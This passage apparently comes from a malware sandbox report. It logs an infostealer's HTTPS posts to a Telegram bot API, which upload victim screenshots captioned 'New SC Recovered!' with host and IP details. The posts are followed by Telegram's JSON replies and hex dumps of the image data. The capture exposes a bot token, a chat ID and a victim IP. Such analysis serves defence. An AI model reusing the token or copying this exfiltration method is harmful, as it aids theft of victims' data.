                                                                  Data Ascii: z(J*?>z(J*?>z(J*?>z(J*?>z(J*?>z(J*?>z(=t*h"T*g03<Xn!O=sS$?`;ucO(k\[/p(v).
                                                                  2024-04-19 17:36:42 UTC50OUTData Raw: 0d 0a 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 38 64 63 39 31 61 64 39 66 36 66 35 37 34 39 2d 2d 0d 0a
                                                                  Data Ascii: -----------------------------8dc91ad9f6f5749--
                                                                  2024-04-19 17:36:42 UTC25INHTTP/1.1 100 Continue
                                                                  2024-04-19 17:36:42 UTC1482INHTTP/1.1 200 OK
                                                                  Server: nginx/1.18.0
                                                                  Date: Fri, 19 Apr 2024 17:36:42 GMT
                                                                  Content-Type: application/json
                                                                  Content-Length: 1093
                                                                  Connection: close
                                                                  Strict-Transport-Security: max-age=31536000; includeSubDomains; preload
                                                                  Access-Control-Allow-Origin: *
                                                                  Access-Control-Allow-Methods: GET, POST, OPTIONS
                                                                  Access-Control-Expose-Headers: Content-Length,Content-Type,Date,Server,Connection
                                                                  {"ok":true,"result":{"message_id":3453,"from":{"id":7177134832,"is_bot":true,"first_name":"bng_bot","username":"shanny1975_bot"},"chat":{"id":1210558492,"first_name":"kelv","last_name":"calin","type":"private"},"date":1713548202,"document":{"file_name":"user-618321 2024-06-21 04-50-07.jpg","mime_type":"image/jpeg","thumbnail":{"file_id":"AAMCBAADGQMAAg19ZiKrqrAZRY24NOjh2I2hO8nVS4QAAsEXAAKLUhlRQczAxVjWXYYBAAdtAAM0BA","file_unique_id":"AQADwRcAAotSGVFy","file_size":12509,"width":320,"height":256},"thumb":{"file_id":"AAMCBAADGQMAAg19ZiKrqrAZRY24NOjh2I2hO8nVS4QAAsEXAAKLUhlRQczAxVjWXYYBAAdtAAM0BA","file_unique_id":"AQADwRcAAotSGVFy","file_size":12509,"width":320,"height":256},"file_id":"BQACAgQAAxkDAAINfWYiq6qwGUWNuDTo4diNoTvJ1UuEAALBFwACi1IZUUHMwMVY1l2GNAQ","file_unique_id":"AgADwRcAAotSGVE","file_size":66515},"caption":"New SC Recovered!\n\nTime: 06/21/2024 04:40:07\nUser Name: user/618321\nOSFullName: Microsoft Windows 10 Pro\nCPU: Intel(R) Core(TM)2 CPU 6600 @ 2.40 GHz\nRAM: 8191.25 MB\nIP Address: 81.181.57.52","caption_entities":[{"offset":179,"length":12,"type":"url"}]}}


                                                                  Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                  22192.168.2.549737149.154.167.2204433472C:\Users\user\Desktop\z1E-catalogSamples.exe
                                                                  TimestampBytes transferredDirectionData
                                                                  2024-04-19 17:36:50 UTC262OUTPOST /bot7177134832:AAFZbBRZvrMTexyCCRWrTRyGHf8Nct0rg7g/sendDocument HTTP/1.1
                                                                  Content-Type: multipart/form-data; boundary=---------------------------8dc94e8357314fa
                                                                  Host: api.telegram.org
                                                                  Content-Length: 67138
                                                                  Expect: 100-continue
                                                                  Connection: Keep-Alive
                                                                  2024-04-19 17:36:50 UTC1024OUTData Raw: 0d 0a 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 38 64 63 39 34 65 38 33 35 37 33 31 34 66 61 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 63 68 61 74 5f 69 64 22 0d 0a 0d 0a 31 32 31 30 35 35 38 34 39 32 0d 0a 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 38 64 63 39 34 65 38 33 35 37 33 31 34 66 61 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 63 61 70 74 69 6f 6e 22 0d 0a 0d 0a 4e 65 77 20 53 43 20 52 65 63 6f 76 65 72 65 64 21 0a 0a 54 69 6d 65 3a 20 30 36 2f 32 35 2f 32 30 32 34 20 30 37 3a 32 31 3a 35 39 0a 55 73 65 72
                                                                  Data Ascii: -----------------------------8dc94e8357314faContent-Disposition: form-data; name="chat_id"1210558492-----------------------------8dc94e8357314faContent-Disposition: form-data; name="caption"New SC Recovered!Time: 06/25/2024 07:21:59User
                                                                  2024-04-19 17:36:50 UTC16355OUTData Raw: 11 04 05 21 31 06 12 41 51 07 61 71 13 22 32 81 08 14 42 91 a1 b1 c1 09 23 33 52 f0 15 62 72 d1 0a 16 24 34 e1 25 f1 17 18 19 1a 26 27 28 29 2a 35 36 37 38 39 3a 43 44 45 46 47 48 49 4a 53 54 55 56 57 58 59 5a 63 64 65 66 67 68 69 6a 73 74 75 76 77 78 79 7a 82 83 84 85 86 87 88 89 8a 92 93 94 95 96 97 98 99 9a a2 a3 a4 a5 a6 a7 a8 a9 aa b2 b3 b4 b5 b6 b7 b8 b9 ba c2 c3 c4 c5 c6 c7 c8 c9 ca d2 d3 d4 d5 d6 d7 d8 d9 da e2 e3 e4 e5 e6 e7 e8 e9 ea f2 f3 f4 f5 f6 f7 f8 f9 fa ff da 00 0c 03 01 00 02 11 03 11 00 3f 00 8e 8a 28 af a7 3e 38 28 a9 e2 b4 9a 44 12 60 2c 67 a3 31 c0 3f d4 d4 cb 6b 0a fd e6 69 0f b7 03 ff 00 af fa 56 52 ab 08 ee cd 61 46 73 d9 14 68 ad 55 b5 b6 91 39 8b 6f ba b1 cf eb 9a 86 4d 34 f5 86 55 6f 66 f9 4f f8 52 8d 78 3f 22 a5 87 9c 7c ca 14
                                                                  Data Ascii: !1AQaq"2B#3Rbr$4%&'()*56789:CDEFGHIJSTUVWXYZcdefghijstuvwxyz?(>8(D`,g1?kiVRaFshU9oM4UofORx?"|
                                                                  2024-04-19 17:36:50 UTC16355OUTData Raw: e7 92 7f df 22 9c aa aa 30 a0 01 e8 2b 4a 58 19 c6 a2 94 a4 ac 8c eb 66 b4 1d 19 c2 9c 5d e4 ad ad 85 a2 8a 2b d5 3e 78 28 a2 8a 00 b5 a5 b2 a6 a9 6a cc 42 a8 95 49 24 e0 01 9a ee 3e dd 67 ff 00 3f 70 7f df c5 ff 00 1a f3 da 2b 8e be 17 db 4b 9a f6 3d 0c 2e 3b ea f0 70 e5 be bd cf 42 fb 7d 97 fc fe 5b ff 00 df d5 ff 00 1a 4f b7 d9 7f cf e5 bf fd fd 5f f1 af 3e a2 b0 fe cf fe f7 e1 ff 00 04 e9 fe d5 fe e7 e3 ff 00 00 ea 7c 4f 75 6d 36 9a 89 0d c4 52 37 9a 0e 11 c1 38 c1 f4 ae 56 8a 2b b3 0f 47 d8 c7 96 f7 38 31 58 8f ac 4d 4a d6 d0 28 a2 8a dc e6 0a 28 a2 80 0a 28 a2 80 0a 4a 5a 28 01 28 a5 a4 a0 02 8a 28 a0 02 8a 28 a0 02 8a 28 a0 04 a2 8a 28 18 51 45 14 c0 4a 29 68 a0 04 a2 8a 5a 00 4a 28 a2 80 0a 4a 5a 4a 06 14 51 45 30 0a 28 a2 80 12 8a 5a 4a 06 14 51
                                                                  Data Ascii: "0+JXf]+>x(jBI$>g?p+K=.;pB}[O_>|Oum6R78V+G81XMJ(((JZ((((((QEJ)hZJ(JZJQE0(ZJQ
                                                                  2024-04-19 17:36:50 UTC16355OUTData Raw: d9 f2 82 51 45 14 00 57 49 e0 bf f9 06 dd 7f d7 d3 ff 00 25 ae 6e ba 4f 05 ff 00 c8 36 eb fe be 9f f9 2d 79 79 8f d8 f9 9f 41 92 fc 35 7d 17 e6 6f 4b 22 43 13 cb 23 05 44 05 98 9e c0 57 19 a1 eb 31 5a de de 5e cc 9f ba bb 72 ec 63 52 4c 58 27 01 bb 73 9a d6 d5 34 7b ed 57 50 29 3c 81 6c 43 02 30 e7 ee 80 32 02 fa 93 9e 4e 6b 71 21 8a 38 04 09 1a 88 82 ed 09 8e 31 e9 5e 3b 52 9c ae b4 b1 f4 d0 9d 2a 14 9c 5f bc e5 bd ba 2f f3 ff 00 22 b5 96 a7 6d 7b 2b c3 19 75 95 14 31 49 10 a9 c1 e8 7d c5 73 3e 2a ff 00 91 8a 3f fa f5 1f fa 19 ae ae da c6 d2 d1 99 ad ad a2 85 9b ef 14 40 33 5c a7 8a bf e4 62 8f fe bd 47 fe 86 6b a2 85 fd a4 2f dc e1 c4 f2 7b 1a bc 9b 72 bd fe 46 65 14 51 5f 48 7c 38 51 45 14 00 51 45 14 0c 28 a2 8a 00 28 a2 8a 00 4a 29 68 a0 04 a2 96 8a
                                                                  Data Ascii: QEWI%nO6-yyA5}oK"C#DW1Z^rcRLX's4{WP)<lC02Nkq!81^;R*_/"m{+u1I}s>*?@3\bGk/{rFeQ_H|8QEQE((J)h
                                                                  2024-04-19 17:36:50 UTC15447OUTData Raw: a2 8a 29 80 51 45 14 00 51 45 14 00 94 51 45 03 0a 4a 5a 4a 00 28 a2 8a 06 14 51 45 00 25 14 51 40 05 14 51 40 c2 90 d2 f6 a4 a0 02 8a 28 a0 04 a2 8a 28 18 52 52 d2 50 01 45 14 50 02 51 4b 49 40 c2 8a 28 a0 02 92 8a 29 8c 28 a2 8a 00 4a 28 cd 26 68 18 b4 94 94 50 16 0c fb 52 66 8a 28 18 52 52 d2 50 01 49 4b 49 40 c2 8a 28 a0 61 49 45 14 00 52 52 d2 50 30 a2 8a 28 01 28 a2 8a 06 21 a2 8a 28 00 a4 a5 a4 a0 61 49 4b 49 40 05 25 2d 14 14 25 14 52 50 08 5a 4a 28 a0 04 34 51 45 03 0a 4a 5a 4a 06 14 94 51 40 09 45 2d 25 03 0a 4a 5a 4a 06 14 94 51 40 05 25 2d 14 0c 4a 28 a2 81 85 25 14 94 00 b4 94 51 40 c3 8a 29 28 a0 02 8a 28 a0 62 51 45 14 0c 4a 28 a2 80 0a 28 a4 a6 30 fe 74 51 f9 50 69 0c 43 c7 34 51 45 30 13 f1 a3 8a 28 a0 61 49 c5 2d 27 14 80 3d e8 fa 51 45
                                                                  Data Ascii: )QEQEQEJZJ(QE%Q@Q@((RRPEPQKI@()(J(&hPRf(RRPIKI@(aIERRP0((!(aIKI@%-%RPZJ(4QEJZJQ@E-%JZJQ@%-J(%Q@)((bQEJ((0tQPiC4QE0(aI-'=QE
                                                                  2024-04-19 17:36:50 UTC1552OUTData Raw: a3 cf 87 fe 7a a7 fd f4 28 02 4a 2a 3f 3e 1f f9 ea 9f f7 d0 a3 cf 87 fe 7a a7 fd f4 28 02 4a 2a 3f 3e 1f f9 ea 9f f7 d0 a3 cf 87 fe 7a a7 fd f4 28 02 4a 2a 3f 3e 1f f9 ea 9f f7 d0 a3 cf 87 fe 7a a7 fd f4 28 02 4a 2a 3f 3e 1f f9 ea 9f f7 d0 a3 cf 87 fe 7a a7 fd f4 28 02 4a 2a 3f 3e 1f f9 ea 9f f7 d0 a3 cf 87 fe 7a a7 fd f4 28 02 4a 2a 3f 3e 1f f9 ea 9f f7 d0 a3 cf 87 fe 7a a7 fd f4 28 00 9f fe 3d e4 ff 00 74 ff 00 2a f9 e6 be 83 9a 68 8c 12 01 22 12 54 ff 00 10 f4 af 9f 2a e2 67 30 ad cd 33 c4 93 d9 d8 fd 82 e6 d6 0b fb 3c ee 58 6e 17 21 4f a8 3d bf 0a c3 a2 a8 83 73 53 f1 24 f7 96 3f 60 b6 b5 82 c2 cf 3b 9a 1b 75 c0 63 ea 4f 7f c6 b0 e8 a2 80 0a 28 a2 98 05 6b dc f8 9f 5c b8 ba 96 7f ed 5b c8 bc c7 2f e5 c5 70 ea 8b 93 9c 28 cf 00 76 ac 8a 29 01 a7 2e b9
                                                                  Data Ascii: z(J*?>z(J*?>z(J*?>z(J*?>z(J*?>z(J*?>z(=t*h"T*g03<Xn!O=sS$?`;ucO(k\[/p(v).
                                                                  2024-04-19 17:36:50 UTC50OUTData Raw: 0d 0a 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 38 64 63 39 34 65 38 33 35 37 33 31 34 66 61 2d 2d 0d 0a
                                                                  Data Ascii: -----------------------------8dc94e8357314fa--
                                                                  2024-04-19 17:36:50 UTC25INHTTP/1.1 100 Continue
                                                                  2024-04-19 17:36:51 UTC1482INHTTP/1.1 200 OK
                                                                  Server: nginx/1.18.0
                                                                  Date: Fri, 19 Apr 2024 17:36:51 GMT
                                                                  Content-Type: application/json
                                                                  Content-Length: 1093
                                                                  Connection: close
                                                                  Strict-Transport-Security: max-age=31536000; includeSubDomains; preload
                                                                  Access-Control-Allow-Origin: *
                                                                  Access-Control-Allow-Methods: GET, POST, OPTIONS
                                                                  Access-Control-Expose-Headers: Content-Length,Content-Type,Date,Server,Connection
                                                                  {"ok":true,"result":{"message_id":3454,"from":{"id":7177134832,"is_bot":true,"first_name":"bng_bot","username":"shanny1975_bot"},"chat":{"id":1210558492,"first_name":"kelv","last_name":"calin","type":"private"},"date":1713548211,"document":{"file_name":"user-618321 2024-06-25 07-27-02.jpg","mime_type":"image/jpeg","thumbnail":{"file_id":"AAMCBAADGQMAAg1-ZiKrs-rdP2z2EJl-dBDvOQy5_8EAAsIXAAKLUhlRi8E5n3rp5YkBAAdtAAM0BA","file_unique_id":"AQADwhcAAotSGVFy","file_size":12509,"width":320,"height":256},"thumb":{"file_id":"AAMCBAADGQMAAg1-ZiKrs-rdP2z2EJl-dBDvOQy5_8EAAsIXAAKLUhlRi8E5n3rp5YkBAAdtAAM0BA","file_unique_id":"AQADwhcAAotSGVFy","file_size":12509,"width":320,"height":256},"file_id":"BQACAgQAAxkDAAINfmYiq7Pq3T9s9hCZfnQQ7zkMuf_BAALCFwACi1IZUYvBOZ966eWJNAQ","file_unique_id":"AgADwhcAAotSGVE","file_size":66515},"caption":"New SC Recovered!\n\nTime: 06/25/2024 07:21:59\nUser Name: user/618321\nOSFullName: Microsoft Windows 10 Pro\nCPU: Intel(R) Core(TM)2 CPU 6600 @ 2.40 GHz\nRAM: 8191.25 MB\nIP Address: 81.181.57.52","caption_entities":[{"offset":179,"length":12,"type":"url"}]}}


                                                                  Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                  23192.168.2.549738149.154.167.2204437324C:\Users\user\AppData\Roaming\vZkoWbol.exe
                                                                  TimestampBytes transferredDirectionData
                                                                  2024-04-19 17:36:55 UTC238OUTPOST /bot7177134832:AAFZbBRZvrMTexyCCRWrTRyGHf8Nct0rg7g/sendDocument HTTP/1.1
                                                                  Content-Type: multipart/form-data; boundary=---------------------------8dc8528d0ad5c27
                                                                  Host: api.telegram.org
                                                                  Content-Length: 67138
                                                                  Expect: 100-continue
                                                                  2024-04-19 17:36:56 UTC1024OUTData Raw: 0d 0a 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 38 64 63 38 35 32 38 64 30 61 64 35 63 32 37 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 63 68 61 74 5f 69 64 22 0d 0a 0d 0a 31 32 31 30 35 35 38 34 39 32 0d 0a 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 38 64 63 38 35 32 38 64 30 61 64 35 63 32 37 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 63 61 70 74 69 6f 6e 22 0d 0a 0d 0a 4e 65 77 20 53 43 20 52 65 63 6f 76 65 72 65 64 21 0a 0a 54 69 6d 65 3a 20 30 36 2f 30 35 2f 32 30 32 34 20 30 36 3a 31 39 3a 31 31 0a 55 73 65 72
                                                                  Data Ascii: -----------------------------8dc8528d0ad5c27Content-Disposition: form-data; name="chat_id"1210558492-----------------------------8dc8528d0ad5c27Content-Disposition: form-data; name="caption"New SC Recovered!Time: 06/05/2024 06:19:11User
                                                                  2024-04-19 17:36:56 UTC16355OUTData Raw: 11 04 05 21 31 06 12 41 51 07 61 71 13 22 32 81 08 14 42 91 a1 b1 c1 09 23 33 52 f0 15 62 72 d1 0a 16 24 34 e1 25 f1 17 18 19 1a 26 27 28 29 2a 35 36 37 38 39 3a 43 44 45 46 47 48 49 4a 53 54 55 56 57 58 59 5a 63 64 65 66 67 68 69 6a 73 74 75 76 77 78 79 7a 82 83 84 85 86 87 88 89 8a 92 93 94 95 96 97 98 99 9a a2 a3 a4 a5 a6 a7 a8 a9 aa b2 b3 b4 b5 b6 b7 b8 b9 ba c2 c3 c4 c5 c6 c7 c8 c9 ca d2 d3 d4 d5 d6 d7 d8 d9 da e2 e3 e4 e5 e6 e7 e8 e9 ea f2 f3 f4 f5 f6 f7 f8 f9 fa ff da 00 0c 03 01 00 02 11 03 11 00 3f 00 8e 8a 28 af a7 3e 38 28 a9 e2 b4 9a 44 12 60 2c 67 a3 31 c0 3f d4 d4 cb 6b 0a fd e6 69 0f b7 03 ff 00 af fa 56 52 ab 08 ee cd 61 46 73 d9 14 68 ad 55 b5 b6 91 39 8b 6f ba b1 cf eb 9a 86 4d 34 f5 86 55 6f 66 f9 4f f8 52 8d 78 3f 22 a5 87 9c 7c ca 14
                                                                  Data Ascii: !1AQaq"2B#3Rbr$4%&'()*56789:CDEFGHIJSTUVWXYZcdefghijstuvwxyz?(>8(D`,g1?kiVRaFshU9oM4UofORx?"|
                                                                  2024-04-19 17:36:56 UTC16355OUTData Raw: e7 92 7f df 22 9c aa aa 30 a0 01 e8 2b 4a 58 19 c6 a2 94 a4 ac 8c eb 66 b4 1d 19 c2 9c 5d e4 ad ad 85 a2 8a 2b d5 3e 78 28 a2 8a 00 b5 a5 b2 a6 a9 6a cc 42 a8 95 49 24 e0 01 9a ee 3e dd 67 ff 00 3f 70 7f df c5 ff 00 1a f3 da 2b 8e be 17 db 4b 9a f6 3d 0c 2e 3b ea f0 70 e5 be bd cf 42 fb 7d 97 fc fe 5b ff 00 df d5 ff 00 1a 4f b7 d9 7f cf e5 bf fd fd 5f f1 af 3e a2 b0 fe cf fe f7 e1 ff 00 04 e9 fe d5 fe e7 e3 ff 00 00 ea 7c 4f 75 6d 36 9a 89 0d c4 52 37 9a 0e 11 c1 38 c1 f4 ae 56 8a 2b b3 0f 47 d8 c7 96 f7 38 31 58 8f ac 4d 4a d6 d0 28 a2 8a dc e6 0a 28 a2 80 0a 28 a2 80 0a 4a 5a 28 01 28 a5 a4 a0 02 8a 28 a0 02 8a 28 a0 02 8a 28 a0 04 a2 8a 28 18 51 45 14 c0 4a 29 68 a0 04 a2 8a 5a 00 4a 28 a2 80 0a 4a 5a 4a 06 14 51 45 30 0a 28 a2 80 12 8a 5a 4a 06 14 51
                                                                  Data Ascii: "0+JXf]+>x(jBI$>g?p+K=.;pB}[O_>|Oum6R78V+G81XMJ(((JZ((((((QEJ)hZJ(JZJQE0(ZJQ
                                                                  2024-04-19 17:36:56 UTC16355OUTData Raw: d9 f2 82 51 45 14 00 57 49 e0 bf f9 06 dd 7f d7 d3 ff 00 25 ae 6e ba 4f 05 ff 00 c8 36 eb fe be 9f f9 2d 79 79 8f d8 f9 9f 41 92 fc 35 7d 17 e6 6f 4b 22 43 13 cb 23 05 44 05 98 9e c0 57 19 a1 eb 31 5a de de 5e cc 9f ba bb 72 ec 63 52 4c 58 27 01 bb 73 9a d6 d5 34 7b ed 57 50 29 3c 81 6c 43 02 30 e7 ee 80 32 02 fa 93 9e 4e 6b 71 21 8a 38 04 09 1a 88 82 ed 09 8e 31 e9 5e 3b 52 9c ae b4 b1 f4 d0 9d 2a 14 9c 5f bc e5 bd ba 2f f3 ff 00 22 b5 96 a7 6d 7b 2b c3 19 75 95 14 31 49 10 a9 c1 e8 7d c5 73 3e 2a ff 00 91 8a 3f fa f5 1f fa 19 ae ae da c6 d2 d1 99 ad ad a2 85 9b ef 14 40 33 5c a7 8a bf e4 62 8f fe bd 47 fe 86 6b a2 85 fd a4 2f dc e1 c4 f2 7b 1a bc 9b 72 bd fe 46 65 14 51 5f 48 7c 38 51 45 14 00 51 45 14 0c 28 a2 8a 00 28 a2 8a 00 4a 29 68 a0 04 a2 96 8a
                                                                  Data Ascii: QEWI%nO6-yyA5}oK"C#DW1Z^rcRLX's4{WP)<lC02Nkq!81^;R*_/"m{+u1I}s>*?@3\bGk/{rFeQ_H|8QEQE((J)h
                                                                  2024-04-19 17:36:56 UTC15447OUTData Raw: a2 8a 29 80 51 45 14 00 51 45 14 00 94 51 45 03 0a 4a 5a 4a 00 28 a2 8a 06 14 51 45 00 25 14 51 40 05 14 51 40 c2 90 d2 f6 a4 a0 02 8a 28 a0 04 a2 8a 28 18 52 52 d2 50 01 45 14 50 02 51 4b 49 40 c2 8a 28 a0 02 92 8a 29 8c 28 a2 8a 00 4a 28 cd 26 68 18 b4 94 94 50 16 0c fb 52 66 8a 28 18 52 52 d2 50 01 49 4b 49 40 c2 8a 28 a0 61 49 45 14 00 52 52 d2 50 30 a2 8a 28 01 28 a2 8a 06 21 a2 8a 28 00 a4 a5 a4 a0 61 49 4b 49 40 05 25 2d 14 14 25 14 52 50 08 5a 4a 28 a0 04 34 51 45 03 0a 4a 5a 4a 06 14 94 51 40 09 45 2d 25 03 0a 4a 5a 4a 06 14 94 51 40 05 25 2d 14 0c 4a 28 a2 81 85 25 14 94 00 b4 94 51 40 c3 8a 29 28 a0 02 8a 28 a0 62 51 45 14 0c 4a 28 a2 80 0a 28 a4 a6 30 fe 74 51 f9 50 69 0c 43 c7 34 51 45 30 13 f1 a3 8a 28 a0 61 49 c5 2d 27 14 80 3d e8 fa 51 45
                                                                  Data Ascii: )QEQEQEJZJ(QE%Q@Q@((RRPEPQKI@()(J(&hPRf(RRPIKI@(aIERRP0((!(aIKI@%-%RPZJ(4QEJZJQ@E-%JZJQ@%-J(%Q@)((bQEJ((0tQPiC4QE0(aI-'=QE
                                                                  2024-04-19 17:36:56 UTC1552OUTData Raw: a3 cf 87 fe 7a a7 fd f4 28 02 4a 2a 3f 3e 1f f9 ea 9f f7 d0 a3 cf 87 fe 7a a7 fd f4 28 02 4a 2a 3f 3e 1f f9 ea 9f f7 d0 a3 cf 87 fe 7a a7 fd f4 28 02 4a 2a 3f 3e 1f f9 ea 9f f7 d0 a3 cf 87 fe 7a a7 fd f4 28 02 4a 2a 3f 3e 1f f9 ea 9f f7 d0 a3 cf 87 fe 7a a7 fd f4 28 02 4a 2a 3f 3e 1f f9 ea 9f f7 d0 a3 cf 87 fe 7a a7 fd f4 28 02 4a 2a 3f 3e 1f f9 ea 9f f7 d0 a3 cf 87 fe 7a a7 fd f4 28 00 9f fe 3d e4 ff 00 74 ff 00 2a f9 e6 be 83 9a 68 8c 12 01 22 12 54 ff 00 10 f4 af 9f 2a e2 67 30 ad cd 33 c4 93 d9 d8 fd 82 e6 d6 0b fb 3c ee 58 6e 17 21 4f a8 3d bf 0a c3 a2 a8 83 73 53 f1 24 f7 96 3f 60 b6 b5 82 c2 cf 3b 9a 1b 75 c0 63 ea 4f 7f c6 b0 e8 a2 80 0a 28 a2 98 05 6b dc f8 9f 5c b8 ba 96 7f ed 5b c8 bc c7 2f e5 c5 70 ea 8b 93 9c 28 cf 00 76 ac 8a 29 01 a7 2e b9
                                                                  Data Ascii: z(J*?>z(J*?>z(J*?>z(J*?>z(J*?>z(J*?>z(=t*h"T*g03<Xn!O=sS$?`;ucO(k\[/p(v).
                                                                  2024-04-19 17:36:56 UTC50OUTData Raw: 0d 0a 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 38 64 63 38 35 32 38 64 30 61 64 35 63 32 37 2d 2d 0d 0a
                                                                  Data Ascii: -----------------------------8dc8528d0ad5c27--
                                                                  2024-04-19 17:36:56 UTC25INHTTP/1.1 100 Continue
                                                                  2024-04-19 17:36:56 UTC1482INHTTP/1.1 200 OK
                                                                  Server: nginx/1.18.0
                                                                  Date: Fri, 19 Apr 2024 17:36:56 GMT
                                                                  Content-Type: application/json
                                                                  Content-Length: 1093
                                                                  Connection: close
                                                                  Strict-Transport-Security: max-age=31536000; includeSubDomains; preload
                                                                  Access-Control-Allow-Origin: *
                                                                  Access-Control-Allow-Methods: GET, POST, OPTIONS
                                                                  Access-Control-Expose-Headers: Content-Length,Content-Type,Date,Server,Connection
                                                                  {"ok":true,"result":{"message_id":3455,"from":{"id":7177134832,"is_bot":true,"first_name":"bng_bot","username":"shanny1975_bot"},"chat":{"id":1210558492,"first_name":"kelv","last_name":"calin","type":"private"},"date":1713548216,"document":{"file_name":"user-618321 2024-06-05 06-29-12.jpg","mime_type":"image/jpeg","thumbnail":{"file_id":"AAMCBAADGQMAAg1_ZiKruCROdQkRW_TgmgauSUCs-AEAAsMXAAKLUhlRmgoo-q5sjo8BAAdtAAM0BA","file_unique_id":"AQADwxcAAotSGVFy","file_size":12509,"width":320,"height":256},"thumb":{"file_id":"AAMCBAADGQMAAg1_ZiKruCROdQkRW_TgmgauSUCs-AEAAsMXAAKLUhlRmgoo-q5sjo8BAAdtAAM0BA","file_unique_id":"AQADwxcAAotSGVFy","file_size":12509,"width":320,"height":256},"file_id":"BQACAgQAAxkDAAINf2Yiq7gkTnUJEVv04JoGrklArPgBAALDFwACi1IZUZoKKPqubI6PNAQ","file_unique_id":"AgADwxcAAotSGVE","file_size":66515},"caption":"New SC Recovered!\n\nTime: 06/05/2024 06:19:11\nUser Name: user/618321\nOSFullName: Microsoft Windows 10 Pro\nCPU: Intel(R) Core(TM)2 CPU 6600 @ 2.40 GHz\nRAM: 8191.25 MB\nIP Address: 81.181.57.52","caption_entities":[{"offset":179,"length":12,"type":"url"}]}}


                                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                                  24192.168.2.549739149.154.167.220443
                                                                  TimestampBytes transferredDirectionData
                                                                  2024-04-19 17:37:12 UTC238OUTPOST /bot7177134832:AAFZbBRZvrMTexyCCRWrTRyGHf8Nct0rg7g/sendDocument HTTP/1.1
                                                                  Content-Type: multipart/form-data; boundary=---------------------------8dc60a81bbe05f3
                                                                  Host: api.telegram.org
                                                                  Content-Length: 67151
                                                                  Expect: 100-continue
                                                                  2024-04-19 17:37:12 UTC1024OUTData Raw: 0d 0a 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 38 64 63 36 30 61 38 31 62 62 65 30 35 66 33 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 63 68 61 74 5f 69 64 22 0d 0a 0d 0a 31 32 31 30 35 35 38 34 39 32 0d 0a 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 38 64 63 36 30 61 38 31 62 62 65 30 35 66 33 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 63 61 70 74 69 6f 6e 22 0d 0a 0d 0a 4e 65 77 20 53 43 20 52 65 63 6f 76 65 72 65 64 21 0a 0a 54 69 6d 65 3a 20 30 34 2f 31 39 2f 32 30 32 34 20 31 39 3a 33 37 3a 31 31 0a 55 73 65 72
                                                                  Data Ascii: -----------------------------8dc60a81bbe05f3Content-Disposition: form-data; name="chat_id"1210558492-----------------------------8dc60a81bbe05f3Content-Disposition: form-data; name="caption"New SC Recovered!Time: 04/19/2024 19:37:11User
                                                                  2024-04-19 17:37:12 UTC16355OUTData Raw: 11 04 05 21 31 06 12 41 51 07 61 71 13 22 32 81 08 14 42 91 a1 b1 c1 09 23 33 52 f0 15 62 72 d1 0a 16 24 34 e1 25 f1 17 18 19 1a 26 27 28 29 2a 35 36 37 38 39 3a 43 44 45 46 47 48 49 4a 53 54 55 56 57 58 59 5a 63 64 65 66 67 68 69 6a 73 74 75 76 77 78 79 7a 82 83 84 85 86 87 88 89 8a 92 93 94 95 96 97 98 99 9a a2 a3 a4 a5 a6 a7 a8 a9 aa b2 b3 b4 b5 b6 b7 b8 b9 ba c2 c3 c4 c5 c6 c7 c8 c9 ca d2 d3 d4 d5 d6 d7 d8 d9 da e2 e3 e4 e5 e6 e7 e8 e9 ea f2 f3 f4 f5 f6 f7 f8 f9 fa ff da 00 0c 03 01 00 02 11 03 11 00 3f 00 8e 8a 28 af a7 3e 38 28 a9 e2 b4 9a 44 12 60 2c 67 a3 31 c0 3f d4 d4 cb 6b 0a fd e6 69 0f b7 03 ff 00 af fa 56 52 ab 08 ee cd 61 46 73 d9 14 68 ad 55 b5 b6 91 39 8b 6f ba b1 cf eb 9a 86 4d 34 f5 86 55 6f 66 f9 4f f8 52 8d 78 3f 22 a5 87 9c 7c ca 14
